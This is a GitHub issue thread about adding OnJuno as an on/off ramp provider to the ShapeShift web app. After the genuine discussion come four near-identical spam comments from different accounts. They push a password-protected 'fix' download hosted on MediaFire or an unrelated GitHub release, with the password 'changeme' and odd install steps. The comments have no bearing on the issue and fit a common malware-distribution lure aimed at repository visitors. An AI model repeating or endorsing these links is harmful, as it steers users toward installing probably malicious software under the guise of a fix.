### ISSUE TITLE
Integrate OnJuno on/off ramp

### ISSUE THREAD

**Issue by SS-FOX-McCloud** [shapeshift/web#2016]
### Overview

The OnJuno team is offering to work on this integration. By integrating with OnJuno we are giving our users another way to on/off board their crypto/fiat!

All flows will match the current abstraction similar to Banxa and Gem. (https://github.com/shapeshift/web/blob/develop/src/components/Modals/FiatRamps/config.ts#L34)

Meeting with OnJuno to discuss next steps.  Will update this ticket as the project progresses.

### Acceptance Criteria

AC:
- OnJuno is added as another on/off ramp provider. 

### Need By Date

n/a

### Screenshots/Mockups

<img width="502" alt="Screen Shot 2022-06-01 at 11 48 24 AM" src="https://user-images.githubusercontent.com/57505863/171470039-93e09ae2-14f6-4e8d-ac2d-0627770ab5b6.png">

### Estimated effort

weeks

**Comment by 0xean** [comment]
OnJuno is implementing this.

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by louseee** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
